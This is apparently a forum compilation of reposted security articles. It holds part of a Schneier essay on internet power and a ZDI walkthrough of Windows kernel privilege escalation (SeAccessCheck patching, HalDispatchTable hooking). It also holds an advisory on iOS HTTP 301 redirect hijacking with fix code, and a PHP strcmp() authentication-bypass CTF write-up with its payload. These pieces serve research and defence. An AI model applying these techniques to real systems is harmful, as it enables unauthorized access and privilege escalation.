to circumvent digital copy protection, most users still can't do it. The problem is that leveraging Internet power requires technical expertise. 
Those with sufficient ability will be able to stay ahead of institutional powers. Whether it's setting up your own e-mail server, effectively using encryption and anonymity tools, or breaking copy protection, there will always be technologies that can evade institutional powers. This is why cybercrime is still pervasive, even as police savvy increases; why technically capable whistleblowers can do so much damage; and why organizations like Anonymous are still a viable social and political force. Assuming technology continues to advance -- and there's no reason to believe it won't -- there will always be a security gap in which technically advanced Robin Hoods can operate. Most people, though, are stuck in the middle. These are people who don't have the technical ability to evade the large governments and corporations, avoid the criminal and hacker groups who prey on us, or join any resistance or dissident movements. These are the people who accept default configuration options, arbitrary terms of service, NSA-installed back doors, and the occasional complete loss of their data. These are the people who get increasingly isolated as government and corporate power align. In the feudal world, these are the hapless peasants. And it's even worse when the feudal lords -- or any powers -- fight each other. As anyone watching Game of Thrones knows, peasants get trampled when powers fight: when Facebook, Google, Apple, and Amazon fight it out in the market; when the US, EU, China, and Russia fight it out in geopolitics; or when it's the US vs. "the terrorists" or China vs. its dissidents. The abuse will only get worse as technology continues to advance. In the battle between institutional power and distributed power, more technology means more damage. We've already seen this: Cybercriminals can rob more people more quickly than criminals who have to physically visit everyone they rob. 
Digital pirates can make more copies of more things much more quickly than their analog forebears. And we'll see it in the future: 3D printers mean that the computer restriction debate will soon involve guns, not movies. Big data will mean that more companies will be able to identify and track you more easily. It's the same problem as the "weapons of mass destruction" fear: terrorists with nuclear or biological weapons can do a lot more damage than terrorists with conventional explosives. And by the same token, terrorists with large-scale cyberweapons can potentially do more damage than terrorists with those same bombs. It's a numbers game. Very broadly, because of the way humans behave as a species and as a society, every society is going to have a certain amount of crime. And there's a particular crime rate society is willing to tolerate. With historically inefficient criminals, we were willing to live with some percentage of criminals in our society. As technology makes each individual criminal more powerful, the percentage we can tolerate decreases. Again, remember the "weapons of mass destruction" debate: As the amount of damage each individual terrorist can do increases, we need to do increasingly more to prevent even a single terrorist from succeeding. The more destabilizing the technologies, the greater the rhetoric of fear, and the stronger institutional powers will get. This means increasingly repressive security measures, even if the security gap means that such measures become increasingly ineffective. And it will squeeze the peasants in the middle even more. Without the protection of his own feudal lord, the peasant was subject to abuse both by criminals and other feudal lords. But both corporations and the government -- and often the two in cahoots -- are using their power to their own advantage, trampling on our rights in the process. 
And without the technical savvy to become Robin Hoods ourselves, we have no recourse but to submit to whatever the ruling institutional power wants. So what happens as technology increases? Is a police state the only effective way to control distributed power and keep our society safe? Or do the fringe elements inevitably destroy society as technology increases their power? Probably neither doomsday scenario will come to pass, but figuring out a stable middle ground is hard. These questions are complicated, and dependent on future technological advances that we cannot predict. But they are primarily political questions, and any solutions will be political. In the short term, we need more transparency and oversight. The more we know of what institutional powers are doing, the more we can trust that they are not abusing their authority. We have long known this to be true in government, but we have increasingly ignored it in our fear of terrorism and other modern threats. This is also true for corporate power. Unfortunately, market dynamics will not necessarily force corporations to be transparent; we need laws to do that. The same is true for decentralized power; transparency is how we'll differentiate political dissidents from criminal organizations. Oversight is also critically important, and is another long-understood mechanism for checking power. This can be a combination of things: courts that act as third-party advocates for the rule of law rather than rubber-stamp organizations, legislatures that understand the technologies and how they affect power balances, and vibrant public-sector press and watchdog groups that analyze and debate the actions of those wielding power. Transparency and oversight give us the confidence to trust institutional powers to fight the bad side of distributed power, while still allowing the good side to flourish. 
For if we're going to entrust our security to institutional powers, we need to know they will act in our interests and not abuse that power. Otherwise, democracy fails. In the longer term, we need to work to reduce power differences. The key to all of this is access to data. On the Internet, data is power. To the extent the powerless have access to it, they gain in power. To the extent that the already powerful have access to it, they further consolidate their power. As we look to reducing power imbalances, we have to look at data: data privacy for individuals, mandatory disclosure laws for corporations, and open government laws. Medieval feudalism evolved into a more balanced relationship in which lords had responsibilities as well as rights. Today's Internet feudalism is both ad-hoc and one-sided. Those in power have a lot of rights, but increasingly few responsibilities or limits. We need to rebalance this relationship. In medieval Europe, the rise of the centralized state and the rule of law provided the stability that feudalism lacked. The Magna Carta first forced responsibilities on governments and put humans on the long road toward government by the people and for the people. In addition to reining in government power, we need similar restrictions on corporate power: a new Magna Carta focused on the institutions that abuse power in the 21st century. Today's Internet is a fortuitous accident: a combination of an initial lack of commercial interests, government benign neglect, military requirements for survivability and resilience, and computer engineers building open systems that worked simply and easily. Corporations have turned the Internet into an enormous revenue generator, and they're not going to back down easily. Neither will governments, which have harnessed the Internet for political control. 
We're at the beginning of some critical debates about the future of the Internet: the proper role of law enforcement, the character of ubiquitous surveillance, the collection and retention of our entire life's history, how automatic algorithms should judge us, government control over the Internet, cyberwar rules of engagement, national sovereignty on the Internet, limitations on the power of corporations over our data, the ramifications of information consumerism, and so on. Data is the pollution problem of the information age. All computer processes produce it. It stays around. How we deal with it -- how we reuse and recycle it, who has access to it, how we dispose of it, and what laws regulate it -- is central to how the information age functions. And I believe that just as we look back at the early decades of the industrial age and wonder how society could ignore pollution in their rush to build an industrial world, our grandchildren will look back at us during these early decades of the information age and judge us on how we dealt with the rebalancing of power resulting from all this new data. This won't be an easy period for us as we try to work these issues out. Historically, no shift in power has ever been easy. Corporations have turned our personal data into an enormous revenue generator, and they're not going to back down. Neither will governments, who have harnessed that same data for their own purposes. But we have a duty to tackle this problem. I can't tell you what the result will be. These are all complicated issues, and require meaningful debate, international cooperation, and innovative solutions. We need to decide on the proper balance between institutional and decentralized power, and how to build tools that amplify what is good in each while suppressing the bad. This essay previously appeared in the Atlantic. Sursa: https://www.schneier.com/blog/archives/2013/10/the_battle_for_1.html
  19. Verifying Windows Kernel Vulnerabilities

Dave Weinstein | October 30, 2013

Outside of the Pwn2Own competitions, HP's Zero Day Initiative (ZDI) does not require that researchers provide us with exploits. ZDI analysts evaluate each submitted case, and as part of that analysis we may choose to take the vulnerability to a full exploit. For kernel level vulnerabilities (either in the OS itself, or in device drivers), one of the vulnerability classes that we find is often termed a 'write-what-where'[1]. For ease of analysis it was worth writing a basic framework to wrap any given 'write-what-where' vulnerability and demonstrate an exploit against the operating system. There are three basic steps to taking our arbitrary write and turning it into an exploit, and we'll explore each of them in turn.

The Payload: Disabling Windows Access Checks

At the heart of the Windows access control system is the function nt!SeAccessCheck. This determines whether or not we have the right to access any object (file, process, etc.) in the OS. The technique we're going to use was first described by Greg Hoglund in 1999[2], and a variant of this technique was used by John Heasman in 2006[3]; it is the latter that we'll use as our jumping-off point. The key here is the AccessMode parameter. If the security check is being done on behalf of a user process, then the OS checks for the correct privileges. However, if the security check is being done on behalf of the kernel, then it always succeeds. Our goal, then, is to dynamically patch the Windows kernel such that it always considers the AccessMode setting to indicate that the call is on behalf of the kernel. On Windows XP, this is a fairly straightforward task. 
If we examine the kernel in IDA (in this case, we're looking at ntkrnlpa.exe), we find the following code early in the implementation of SeAccessCheck:

PAGE:005107BC xor ebx, ebx
PAGE:005107BE cmp [ebp+AccessMode], bl
PAGE:005107C1 jnz short loc_5107EC

Since KernelMode is defined as 0 in wdm.h, all we have to do to succeed in all cases is to NOP out the conditional jump after the compare. At that point, all access checks succeed. On later versions of the OS, things are slightly more complicated. The function nt!SeAccessCheck calls nt!SeAccessCheckWithHint, and it is the latter that we'll need to patch. We'll see why this makes things more complicated when we look at how to gather the information needed to execute the attack. If we look at Windows 8.1, we can see that instead of dropping through to the KernelMode functionality, we branch to it:

.text:00494613 loc_494613:
.text:00494613 cmp [ebp+AccessMode], al
.text:00494616 jz loc_494B28

All we need to do is replace the conditional branch with an unconditional branch, and we again make every call to SeAccessCheck appear to come from the kernel. Now that we have a target, we still have one more, slight problem to overcome. The memory addresses we need to overwrite are in read-only pages. We could change the settings on those pages, but there is an easier solution. On the x86 and x64 processors, there is a flag in Control Register 0 which determines whether or not supervisor mode code (i.e. Ring 0 code, which is to say, our exploit) pays attention to the read-only status of memory. To quote Barnaby Jack[4]:

- "Disable the WP bit in CR0."
- "Perform code and memory overwrites."
- "Re-enable WP bit."

At this point, the actual core of our exploit looks like this: There is one additional complication to our manipulation of the WP bit. We need to set the processor affinity for our exploit, to make sure that we stay on the core with the processor settings we chose. 
While this is likely unnecessary for our manipulation of the WP bit, it is more of an issue in more complicated exploits that require us to disable SMEP (more on that later). Either way, it doesn't hurt, and all we have to do is make a simple call:

SetProcessAffinityMask(GetCurrentProcess(), (DWORD_PTR) 1);

Now, one thing you'll note in the exploit code is that we don't actually know what the patch is, or where it is going. The exploit just takes information that was already provided, and applies it. We'll actually determine that information as part of the exploit research.

The Attack: Passing control to the exploit

We have code ready to run in ring 0. We need two things to make it work: the information it requires about the OS configuration, and a means to transfer control to our code while the processor is in supervisor mode. Since the primitive that we have to work with is a 'write-what-where', we are going to use that to overwrite a function pointer in the HalDispatchTable. This technique, described by Ruben Santamarta in 2007[5], will allow us to divert execution flow to our exploit code. The function we're going to hook is hal!HaliQuerySystemInformation. This is a function that is called by an undocumented Windows function, NtQueryIntervalProfile[5][6], and the invoking function is not commonly used. To understand why this is crucial, we need to briefly talk about the layout of memory in Windows. Windows divides memory into two ranges; kernel memory is located above MmUserProbeAddress, and user memory is located below it. Memory in the kernel is common to all processes (although generally inaccessible to the process code itself), while memory in userland is different for each process loaded. Since our exploit code is going to be in user memory, but we are hooking a kernel function pointer, if any other process calls NtQueryIntervalProfile it will almost certainly crash the operating system. 
Because of this, the first step in our exploit is to restore the original function pointer: As with our earlier example, you can see that we're relying on external information as to where the function pointer entry is, and what the original value should be. At this point, our actual exploit trigger looks like this: For flexibility, our prototype for WriteWhatWhere() also includes the original value for the address, if known. Finding the addresses we need for both the exploit and the exploit hook is the final step.

The Research: Determining the OS Configuration

In this case, we're assuming that we are looking for a local elevation-of-privilege. We have the ability to run arbitrary code on the system as some user, and our goal is to turn that into a complete system compromise. Determining the OS configuration is much more difficult in the case of a remote attack against a kernel vulnerability. We've determined that we need to know the following pieces of information:

- The address of nt!HalDispatchTable
- The address of hal!HaliQuerySystemInformation
- The address of the code in nt!SeAccessCheck or the related helper function we need to patch
- The value to patch

Additionally, we can also look up the original value, which would let us have a different exploit that restored the original functionality. After all, once we've done what we need to do, why leave the door open? What we'll need to know are the base addresses of two kernel modules, the hardware abstraction layer (HAL) and the NT kernel itself. In order to get those, we'll need to again use an undocumented function -- in this case we need NtQuerySystemInformation[6][7]. Since we know that we're going to need two NT functions, we'll go ahead and create the prototypes and simply load them directly from the NT DLL: The next step is to determine which versions of these modules are in use, and where they are actually located in memory. 
We do this by using NtQuerySystemInformation to pull in the set of loaded modules, and then searching for the possible names for the modules we need: Our next step is, in almost every case other than this, a bad idea[8]. We’re going to use a highly deprecated feature of LoadLibraryEx and load duplicate copies of the two modules we found: With this flag set, we won’t load any referenced modules, we won’t execute any code, but we will be able to use GetProcAddress() to search the modules. This is exactly what we want, because we’re going to be using these loaded modules as our source to search for what we need in the actual running kernel code. At this point, we have almost everything we’re going to need to find the offsets we require. We have both the base address of our copies of the kernel modules and the actual base addresses on the system, so we can convert a relative address (RVA) from our copy into an actual system address. And we have read-access to copies of the code, so we can scan the code to look for identifiers for the functions we need. The only thing left is actually a stock Windows call, and we’ll use GetVersionEx() to determine what version of Windows is running. Some things are easy, because the addresses are exported: But for most of what we need, we’re actually going to have to search. We have two functions to search for, one of which (hal!HaliQuerySystemInformation) does not have an exported symbol, and the other is either nt!SeAccessCheck or a function directly called by it. We’ll look at the last case, because that lets us look at how we handle both exported functions and those that are purely private. 
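The conversion described here is plain pointer arithmetic: subtract the copy's base to get the relative virtual address (RVA), then add the live image's base. A hedged sketch (the function name is ours, not the article's):

```cpp
// Rebase an address found in our scanned copy of a module to its address in
// the actually loaded kernel image: same RVA, different base.
#include <cstdint>

std::uintptr_t RebaseAddress(std::uintptr_t addr_in_copy,
                             std::uintptr_t copy_base,
                             std::uintptr_t live_base) {
    std::uintptr_t rva = addr_in_copy - copy_base;  // relative virtual address
    return live_base + rva;                         // same offset, live image
}
```

For example, a match at 0x10004567 in a copy loaded at 0x10000000 corresponds to RVA 0x4567 in the real module.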
First, a look at nt!SeAccessCheck:

And then a look at the portion of nt!SeAccessCheckWithHint that we're going to patch:

In practice, these two functions are adjacent to each other, but we're going to go ahead and use the public function to track down the reference to the internal function, and then scan the internal function for our patch location. The code to do that looks like this:

The function PatternScan is simply a helper routine that, given a pointer, a scan size, a scan pattern, and a scan pattern size, finds the start of the pattern (or NULL if no pattern could be found). In the code above, we search first for the relative jump to nt!SeAccessCheckWithHint, and extract the offset. We use that to calculate the actual start of nt!SeAccessCheckWithHint in our copy of the module, and then we scan for the identifying pattern of the conditional branch we need to replace. Once we find the location, we can determine the actual address by converting it first to an RVA and then rebasing it off of the actual loaded kernel image. Finally, the replacement value is OS-version dependent as well; in this case the replacement for the JZ (0x0f 0x84) is a NOP (0x90) and a JMP (0xe9).

By gathering the information we need from the copied version of the system modules, we're able to have the same framework target multiple versions of the Windows operating system. By searching for patterns within the target functions, we are more resistant to changes in the OS that aren't directly in the functions we're looking for.

Some final complications

Everything we've done so far will work, up until we get to Windows 8, or more specifically the NT 6.2 kernel. For convenience, we have the actual code of the exploit running in user memory. With the Ivy Bridge architecture, Intel introduced a feature called Supervisor Mode Execute Protection (SMEP) [9].
If SMEP is enabled, the processor faults if we attempt to execute instructions from user-mode addresses while the processor is in supervisor mode. The moment control passes from our hooked function pointer in the kernel to our code, we get an exception. Windows supports SMEP as of Windows 8/Server 2012, and the feature is enabled by default on processors that support it. To get around this, we either need to move our exploit into executable kernel memory (something that is also made more difficult in the NT 6.2 kernel) [10], or disable SMEP separately [11][12].

The final problem for us was introduced in Windows 8.1: in order to get Windows 8.1 to tell us the real version of the operating system, we need to take additional steps. According to MSDN [13]:

With the manifest included, we're able to correctly detect Windows 8.1, and adjust our search parameters appropriately when determining offsets.

Conclusion

There is, of course, one piece missing. While a framework to prove exploitation is useful, we still need an arbitrary 'write-what-where' for this to work. We use this framework internally to validate these flaws, so if you happen to find a new one, you can always submit it to us (with or without an exploit payload) at the Zero Day Initiative. We'd love to hear from you.

Endnotes

[1] The earliest formal reference I can find to this terminology is in Gerardo Richarte's paper "About Exploits Writing" (G-CON 1, 2002), where he divides the primitive into a "write-anything-somewhere" and a "write-anything-anywhere". In this case, our "write-what-where" is a "write-anything-anywhere".
[2] Greg Hoglund, "A *REAL* NT Rootkit, patching the NT Kernel" (Phrack 55, 1999)
[3] John Heasman, "Implementing and Detecting an ACPI BIOS Rootkit" (Black Hat Europe, 2006)
[4] Barnaby Jack, "Remote Windows Kernel Exploitation – Step In To the Ring 0" (Black Hat USA, 2005) [White Paper]
[5] Ruben Santamarta, "Exploiting Common Flaws in Drivers" (2007)
[6] Although it does not cover newer versions of the Windows OS, Windows NT/2000 Native API Reference (Gary Nebbett, 2000) is still an excellent reference for internal Windows API functions and structures.
[7] Alex Ionescu, "I Got 99 Problems But a Kernel Pointer Ain't One" (RECon, 2013)
[8] Raymond Chen, "LoadLibraryEx(DONT_RESOLVE_DLL_REFERENCES) is fundamentally flawed" (The Old New Thing)
[9] Varghese George, Tom Piazza, and Hong Jiang, "Intel Next Generation Microarchitecture Codename Ivy Bridge" (IDF, 2011)
[10] Ken Johnson and Matt Miller, "Exploit Mitigation Improvements in Windows 8" (Black Hat USA, 2012)
[11] Artem Shishkin, "Intel SMEP overview and partial bypass on Windows 8" (Positive Research Center)
[12] Artem Shishkin and Ilya Smit, "Bypassing Intel SMEP on Windows 8 x64 using Return-oriented Programming" (Positive Research Center)
[13] MSDN, "Operating system version changes in Windows 8.1 and Windows Server 2012 R2"

Additional Reading

Enrico Perla and Massimiliano Oldani, A Guide to Kernel Exploitation: Attacking the Core (Syngress, 2010)
bugcheck and skape, "Kernel-mode Payloads on Windows" (Uninformed Volume 3, 2006)
skape and Skywing, "A Catalog of Windows Local Kernel-mode Backdoor Techniques" (Uninformed Volume 8, 2007)
mxatone, "Analyzing local privilege escalations in win32k" (Uninformed Volume 10, 2008)

Sursa: Verifying Windows Kernel Vulnerabilities - HP Enterprise Business Community
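Returning to the search logic the article describes (find the relative jump into nt!SeAccessCheckWithHint, extract its rel32 offset, then scan the target for the JZ to patch): the same idea can be modeled in Python over a few fabricated bytes. Real kernel code obviously looks nothing like this toy buffer, and the base address is invented:

```python
import struct

def pattern_scan(data: bytes, pattern: bytes) -> int:
    """Analogue of the article's PatternScan helper: offset, or -1 if absent."""
    return data.find(pattern)

# Fabricated "module" bytes: a public function that does a relative
# CALL (e8 rel32) into an internal helper, which contains a JZ (0f 84).
module = bytes([
    0x90, 0x90,
    0xE8, 0x05, 0x00, 0x00, 0x00,        # call +5 -> helper at offset 12
    0x90, 0x90, 0x90, 0x90, 0x90,
    0x0F, 0x84, 0x44, 0x33, 0x22, 0x11,  # jz rel32: the branch to patch
])

# Step 1: find the relative call and extract its rel32 displacement.
call_off = pattern_scan(module, b"\xE8")
rel32 = struct.unpack_from("<i", module, call_off + 1)[0]
helper_start = call_off + 5 + rel32      # x86 rel32 is relative to the next insn

# Step 2: scan the helper for the conditional branch (JZ = 0f 84).
jz_off = helper_start + pattern_scan(module[helper_start:], b"\x0F\x84")

# Step 3: rebase onto the live image and pick the patch bytes.
kernel_base = 0xFFFFF80001000000         # invented
patch_addr = kernel_base + jz_off
patch = b"\x90\xE9"                      # NOP + JMP, as described in the article

print(hex(patch_addr), patch.hex())
```

The point of the exercise is the shape of the logic, not the bytes: scan a readable copy, do the offset arithmetic there, and only touch the live image with the final write.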
  20. HTTP Request Hijacking

Posted by Yair Amit

Preface

This post contains details about a coding pitfall I recently identified in many iOS applications, which we call HTTP Request Hijacking (HRH). Adi Sharabani, Skycure's CEO, and I will be presenting the problem, its ramifications, and some fix suggestions to developers later today at RSA Europe (14:10 – 15:00 | Room: G102). If you are an iOS developer in a hurry to fix this issue, feel free to jump over to the "Remediation" section. We've created a quick-and-easy solution that will automatically protect all vulnerable iOS apps.

Overview

Nowadays almost all mobile applications interact with a server to send or retrieve data, whether it's information to display or commands to be executed. Many of these applications are susceptible to a simple attack, in which the attacker can persistently alter the server URL from which the app loads its data (e.g., instead of loading the data from real.site, the attack makes the app persistently load the data from attacker.site).

While the problem is generic and can occur in any application that interacts with a server, the implications of HRH for news and stock-exchange apps are particularly interesting. It is commonplace for people to read the news through their smartphones and tablets, and to trust what they read. If a victim's app is successfully attacked, she is no longer reading the news from a genuine news provider, but instead phoney news supplied by the attacker's server.

Upon testing a variety of high-profile apps, we found many of them vulnerable. This brings us to a philosophical question: when someone gets up in the morning and reads news via her iPhone, how sure can she be that the reports she reads are genuine and not fake ones planted by a hacker?

HTTP Request Hijacking

The problem in a nutshell

The problem essentially revolves around the impact of HTTP redirection caching in mobile applications.
Many iOS applications cache HTTP status code 301 when received over the network as a response. While the 301 Moved Permanently HTTP response has valuable uses, it also has severe security ramifications on mobile apps, as it could allow a malicious attacker to persistently alter and remotely control the way the application functions, without any reasonable way for the victim to know about it. Whereas browsers have an address bar, most mobile apps do not visually indicate the server they connect to, making HRH attacks seamless, with a very low probability of being identified by the victims.

HTTP Request Hijacking attacks start with a man-in-the-middle scenario. When the vulnerable app sends a request to its designated server (e.g., http://www.real.site/resource), the attacker captures it and returns a 301 HTTP redirection to an attacker-controlled server (e.g., http://www.attacker.site/resource). Let's take a look at the RFC definition of the 301 Moved Permanently HTTP response:

10.3.2 301 Moved Permanently

The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise.

Source: RFC 2616, Fielding, et al.

The 301 HTTP redirection issued by the attacker is therefore kept in the app's cache, changing the original code's behavior from then on. Instead of retrieving data from http://www.real.site, the app now loads data from http://www.attacker.site, even after the MiTM attack is over and the attacker is long gone.

How it all began

One evening, Assaf Hefetz and Roy Iarchy, two Skycure engineers, called me over and told me they had come across a weird redirection bug in our product.
We started discussing it when it suddenly hit me that this "bug" might in fact be a widespread vulnerability waiting to be discovered! A few days later we had a "white night" (working into the night) that resulted in a working PoC of an attack against a well-known iOS application. We went on to test a bunch of high-profile applications, and were amazed to find that about half of them were susceptible to HRH attacks. Focusing on leading App Store news apps, we found many of them vulnerable and easy to exploit.

Unlike most vulnerabilities, where a responsible disclosure could be made in private to the vendor in charge of the vulnerable app, we soon realized that HTTP Request Hijacking affects a staggering number of iOS applications, rendering the attempt to alert vendors individually virtually impossible. We therefore chose to reveal the problem, along with clear and detailed fix instructions, to empower developers to fix their code quickly and efficiently, before hackers attempt to exploit it.

The Skycure Journal: A Responsible Disclosure case study

As part of our Responsible Disclosure policy, we decided not to name specific vulnerable apps we are aware of as long as they are not fixed. Therefore, for the sake of discussing the technical nature of the problem and our proposed fix, we created a sample news application, which we called "The Skycure Journal". You can clone its code through .

While very basic, The Skycure Journal operates in a similar way to most major news apps: it loads a feed of news from a server (http://skycure-journal.herokuapp.com/) in JSON format, parses it, and then displays it to the reader.

Img. 1 – Skycure Journal App

Here's a relevant snippet from the code:

```objc
- (void)fetchArticles {
    NSURL *serverUrl = [NSURL URLWithString:@"http://skycure-journal.herokuapp.com"];
    NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:serverUrl];
    [request setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];
    self.connection = [[NSURLConnection alloc] initWithRequest:request delegate:self];
}
```

This code, variations of which can be found in many iOS apps, is susceptible to a network-based HRH attack. By capturing the request to http://skycure-journal.herokuapp.com/ (via a MiTM attack, for example) and returning a 301 Moved Permanently HTTP response directing the victim's app to an attacker-controlled server (e.g., http://ATTACKER/SJ_headlines.json), the Skycure Journal logic will persistently change to loading data from the attacker's server, no matter where and when the victim uses it in the future. Without touching the application binary, HRH makes it behave as if the code was altered to this:

```objc
NSURL *serverUrl = [NSURL URLWithString:@"http://ATTACKER/SJ_headlines.json"];
```

A quick demo

Imagine the following scenario: a victim walks into Starbucks, connects to the Wi-Fi, and uses her favorite apps. Everything looks and behaves as normal, but an attacker is sitting at a nearby table and performs a silent HRH attack on her apps. The next day, she wakes up at home and logs in to read the news, but she's now reading the attacker's news!

Ariel Sakin, Skycure's head of engineering, and Igal Kreichman, Skycure engineer, created a really cool demo showing how the attack appears from the attacker's and victim's perspectives.

While cache attacks have been thoroughly discussed in the past, they were perceived more as a browser problem than a native-app problem.
The reason is that by performing a classical cache-poisoning attack (e.g., returning a fake JSON/XML response with cache-control directives) on native apps, the impact is very limited. In such attacks, since the cached response is static by nature (as long as the native app does not rely on an embedded browser to render it), the attacker would not be able to persistently view, control, or manipulate the app's traffic. On the other hand, HRH attacks give the attacker remote and persistent control over the victim's app.

HRH limitations and advanced techniques

The aforementioned attack has two limitations:

- The attacker needs to be physically near the victim for the initial poisoning (the next steps of an HRH attack can be carried out against the victim regardless of geolocation).
- The attack works only against HTTP traffic (well, almost only).

In a previous post, we uncovered the ramifications of malicious profiles. It is interesting to note that by luring a victim to install a malicious profile that contains a root CA, an attacker can mount HRH attacks on SSL traffic as well. Combining the malicious-profiles threat we uncovered with this new threat of HTTP Request Hijacking generates a troubling scenario: even after the malicious profile is identified and removed from the device, attacked apps continue to interact seamlessly with the attacker's server instead of the real server, without the victim's knowledge.

Remediation

For app developers

HRH affects a large proportion of iOS apps, and we want to help ensure as many as possible are properly protected before exploits of this vulnerability start to appear. There are two main approaches for tackling HRH:

Option A

Make sure the app interacts with its designated server(s) via an encrypted protocol (e.g., HTTPS instead of HTTP). As described earlier in the post, this is an effective mitigation for HRH, but not a fix.

Option B

Assaf Hefetz, of our R&D team, has come up with this cool and simple fix for vulnerable apps.
Step 1

Create a new subclass of NSURLCache that avoids 301 redirection caching. Leave the rest of the logic intact.

```objc
@interface HRHResistantURLCache : NSURLCache
@end

@implementation HRHResistantURLCache

- (void)storeCachedResponse:(NSCachedURLResponse *)cachedResponse
                 forRequest:(NSURLRequest *)request {
    if (301 == [(NSHTTPURLResponse *)cachedResponse.response statusCode]) {
        return;
    }
    [super storeCachedResponse:cachedResponse forRequest:request];
}

@end
```

Step 2

Set the new cache to be used by the app, making sure you place the initialization code before any request in your code.

```objc
#define DEFAULT_MEMORY_CAPACITY 512000
#define DEFAULT_DISK_CAPACITY   10000000

HRHResistantURLCache *myCache = [[HRHResistantURLCache alloc]
    initWithMemoryCapacity:DEFAULT_MEMORY_CAPACITY
              diskCapacity:DEFAULT_DISK_CAPACITY
                  diskPath:@"MyCache.db"];
[NSURLCache setSharedURLCache:myCache];
```

For CIOs/CISOs

We see a significant increase in attacks mounted via the networks around us. Some affect apps; others the entire device. Skycure is dedicated to providing companies with a solution that detects and protects employee devices from a variety of trending mobile security threats. If you are interested, why not start a free trial?

For iOS users

If you believe you've been subject to an HRH attack, remove the app and then reinstall it, to ensure the attack is removed. Then please drop us a line at security@skycure.com to tell us about it. It is of course always recommended to keep your apps fully up to date, so that when fixes are released, you'll have them installed on your device at the earliest opportunity. Do this either manually or by enabling auto-update in iOS 7.

Future work

In this write-up we've discussed the impact of 301 HTTP responses on mobile applications. Note that there are other redirection responses that might also prove problematic, such as the 308 HTTP response (still a draft at the time of writing).
HRH isn’t necessarily a problem of iOS applications alone; it may apply to mobile applications of other operating systems too. Sursa: Skycure HTTP Request Hijacking
[h=3]Unauthorized Access: Bypassing PHP strcmp()[/h]

While playing Codegate CTF 2013 this weekend, I had the opportunity to complete Web 200, which was very interesting. So, let's get our hands dirty. The main page asks you to provide a valid One-Time-Password in order to log in:

A valid password can be provided by selecting the "OTP issue" option; we can see the source code (provided during the challenge) below:

```php
include("./otp_util.php");
echo "your ID : ".$_SERVER["REMOTE_ADDR"]."";
echo "your password : ".make_otp($_SERVER["REMOTE_ADDR"])."";
$time = 20 - (time() - ((int)(time()/20))*20);
echo "you can login with this password for $time secs.";
```

A temporary password is calculated based on my external IP (208.54.39.160), which will last 20 seconds or less; below is the result:

So, then I clicked on the "Login" option (see first image above) and the POST data below was sent:

id=208.54.39.160&ps=69b9a663b7cafaca2d96c6d1baf653832f9d929b

Which gave me access to the web site (line 6 in the code below). But we cannot reach line 9 (see code below) in order to get the flag, since the IP in the "id" parameter was different. Let's analyze the script that handles the Login Form (login_ok.php):

```php
1. $flag = file_get_contents($flag_file);
2. if (isset($_POST["id"]) && isset($_POST["ps"])) {
3.   $password = make_otp($_POST["id"]);
4.   sleep(3); // do not bruteforce
5.   if (strcmp($password, $_POST["ps"]) == 0) {
6.     echo "welcome, ".$_POST["id"];
8.     if ($_POST["id"] == "127.0.0.1") {
9.       echo "Flag:".$flag;
       }
     } else {
       echo "alert('login failed..')";
     }
   }
```

Test case 1: Spoofing the client IP address

So, the first thing that came to my mind in order to get the flag (line 9) was to send "127.0.0.1" in the "id" parameter, so let's analyze the function make_otp(), which calculates the password:

```php
$flag_file = "flag.txt";
function make_otp($user) {
    // access for 20 secs.
    $time = (int)(time()/20);
    $seed = md5(file_get_contents($flag_file)).md5($_SERVER['HTTP_USER_AGENT']);
    $password = sha1($time.$user.$seed);
    return $password;
}
```

As we can see in the code above, the function make_otp() receives the "id" parameter in the $user variable, and it is used to calculate the password. So, by following this approach, we will not be able to pass line 5, since we need a password for the IP 127.0.0.1, and we can only request passwords based on our external IP via the "OTP issue" option, as explained above. So, how can we get one? What if we try to find a vulnerability in the code related to the "OTP issue" option?

Since "OTP issue" is reading the IP from the environment variable "REMOTE_ADDR", we could try to spoof our external IP address as if we were connecting from 127.0.0.1. Unfortunately, this is not a good option: although spoofing could be possible, it is only a one-way communication, so we would not get a response from the server. At this point, we need to discard this approach.

Test case 2: Bruteforcing the password

By looking at the make_otp() function shown above, the only data we do not know in the password-calculation process is the content of $flag_file (obviously). So, even assuming that the content of that file is less than 4-5 characters and we therefore have a chance to bruteforce the MD5 hash, we would only have 20 seconds to guess it, and due to the sleep(3) command (see line 4 above), we could only guess 6 passwords before the password expires. We can therefore definitely drop the bruteforcing approach off the table.

Test case 3: Bypassing the strcmp() function

After analyzing the two cases described above, I started "googling" for "strcmp php vulnerabilities" but did not find anything. Then, by looking at the PHP documentation, I realized this function has only three possible return values:

int strcmp ( string $str1 , string $str2 )

Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal.
Obviously, we need to find a way to force strcmp() to return 0 so that we can bypass line 5 (see above) without even knowing the password. So, I started wondering: what would the return value be if there is an error during the comparison? I prepared a quick test comparing str1 with an array (or an object) instead of another string:

```php
$fields = array(
    'id' => '127.0.0.1',
    'ps' => 'bar'
);
$a = "danux";
if (strcmp($a, $fields) == 0) {
    echo "This is zero!!";
} else {
    echo "This is not zero";
}
```

And got the warning below from PHP:

PHP Warning: strcmp() expects parameter 2 to be string, array given in ...

But guess what? Voila! It also prints the string "This is zero!!". In other words, it returns 0 as if both values were equal. So, the last but not least step is to send an array in the "ps" POST parameter so that we can bypass line 5. After some research and help from my friend Joe B., I learned I can send an array this way:

id=127.0.0.1&ps[]=a

Notice that instead of sending "&ps=a", I also send the square brackets [] in the parameter name, which will send an array object!! Also, notice that I am sending "id=127.0.0.1" so that I can get to line 9. And after sending this POST request...

Conclusion:

I tested this vulnerability with my local version of PHP/5.3.2-1ubuntu4.17; I do not know the version running on the CTF server, but it should be similar. After this exercise, I would suggest you all make sure you are not using strcmp() to compare values coming from end users (via POST/GET/Cookies/Headers, etc.). This also reminds me of the importance of not only validating parameter values BUT also parameter names, as described in one of my previous blogs here. Hope you enjoyed it. Thanks to the CODEGATE team for preparing those interesting challenges!

Posted by Danux

Sursa: Regalado (In) Security: Unauthorized Access: Bypassing PHP strcmp()
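The root cause of the bypass above chains two PHP behaviors: strcmp() emits a warning and returns NULL when handed a non-string, and NULL == 0 is true under loose comparison. Here is a small Python simulation of that chain; it models the PHP semantics rather than reproducing them, and all names are invented:

```python
def php_strcmp(a, b):
    # PHP's strcmp() emits a warning and returns NULL when either
    # argument is not a string; we model NULL as Python's None.
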